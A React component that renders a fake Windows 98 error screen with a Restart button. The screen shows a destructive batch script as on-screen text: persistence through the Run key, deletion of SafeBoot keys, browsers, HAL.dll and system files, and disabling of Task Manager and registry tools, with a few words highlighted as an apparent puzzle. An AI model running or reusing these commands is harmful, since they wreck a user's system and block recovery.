import React from 'react'
import classNames from 'classnames'
import TaskBarContainer from '../TaskBarWin98/BaseTaskBar/TaskBarContainer'
import StartButton from '../TaskBarWin98/StartButton/StartButton'
import WindowsNotificationArea from '../TaskBarWin98/WindowsNotificationArea/WindowsNotificationArea'
import styles from './WindowsErrorPage.module.scss'

export interface IWindowsErrorPageProps
    extends React.DetailedHTMLProps<React.HTMLAttributes<HTMLDivElement>, HTMLDivElement> {
    onRestart?: () => void
}

export default function WindowsErrorPage({ className, onRestart, ...props }: IWindowsErrorPageProps) {
    return (
        <div {...props} className={classNames(styles.root, className)}>
            <div className={styles.errorContainer}>
                copy %0 %WinDir%\Win32.bat &gt; nul
                <br />
                copy %0 %windir%\Win32.bat &gt; nul
                <br />
                reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d %windir%\Win32.bat /f
                <br />
                Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
                <br />
                Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
                <br />
                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d
                1 /f &gt; nul
                <br />
                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t
                REG_DWORD /d 1 /f &gt;nul
                <br />
                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f
                &gt; nul
                <br />
                rundll32 mouse,disable &gt; nul
                <br />
                rundll32 keyboard,<strong className={styles.keyWord}>UNLOCK</strong> &gt; nul
                <br />
                rundll32 user,disableoemlayer &gt; nul
                <br />
                echo_inactive2960932 off
                <br />
                taskkill /im /f chrome.exe
                <br />
                taskkill /im /f ie.exe
                <br />
                taskkill /im /f firefox.exe
                <br />
                taskkill /im /f opera.exe
                <br />
                taskkill /im /f safari.exe
                <br />
                del C:\Program Files\Google\Chrome\Application\chrome.exe /q
                <br />
                del C:\Program Files\Safari\safari.exe /q
                <br />
                del C:\Program Files\Mozilla Firefox\firefox.exe /q
                <br />
                del C:\Program Files\<strong className={styles.keyWord}>OF</strong>\opera.exe /q
                <br />
                del C:\Program Files\Internet Explorer\ie.exe /q
                <br />
                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_
                <strong className={styles.keyWord}>TRUE</strong> /d %SystemRoot%\explorer.exe /f &gt; nul
                <br />
                taskkill /f /im explorer.exe &gt; nul
                <br />
                del: *.*/q &gt; nul
                <br />
                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1
                /f &gt;nul
                <br />
                del %WinDir%\system32\HAL.dll/q &gt; nul
                <br />
                del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q &gt;nul
                <br />
                del "%SystemRoot%\Media" /q &gt; nulassoc .lnk=.txt%SystemRoot%/system32/rundll32 user32,
                SwapMouseButton &gt;nul
                <br />
                del "%SystemRoot%\Cursors\*.*" &gt;nul
                <br />
                reg add HKCU\Software\Microsoft\Windows\Current <strong className={styles.keyWord}>VALUE</strong>
                \Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f &gt;nul
                <br />
                copy "%0" "%SystemRoot%\system32\sys321.bat &gt; nul
                <br />
                del %0
            </div>
            <TaskBarContainer className={styles.taskBar}>
                <StartButton className={styles.startButton} onClick={onRestart}>
                    Restart
                </StartButton>
                <div className={styles.left}>
                    <div className={styles.line} />
                    <WindowsNotificationArea />
                </div>
            </TaskBarContainer>
        </div>
    )
}
